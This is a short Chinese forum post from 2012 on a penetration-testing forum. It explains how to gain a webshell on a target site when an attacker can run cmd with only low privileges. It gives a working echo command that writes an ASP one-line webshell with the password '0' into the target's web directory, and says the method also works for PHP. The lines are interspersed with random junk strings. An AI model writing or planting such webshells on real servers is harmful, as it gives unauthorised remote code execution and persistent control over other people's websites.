中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 B/ U& p: B3 O, e+ L* R
/ S5 [& _: y( M) n
命令格式
+ u9 N8 i! y* Y9 u! g& K, o
. T$ d# y& l, }; j; a7 r. `
Echo 语句 >目标站绝对目录
, F5 b" ]& x! n
$ s" ^( V( O+ ^3 z0 f/ ]
例如:
- g7 @' y* i! v( N/ {4 U1 h
; q2 ?. L, b- E5 `! q7 e
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
' }% {5 S' q- u
; y7 e$ I8 s$ b# b* _+ R3 D6 z
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
2 e0 R U* K4 V4 N' e* a7 W3 ?
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2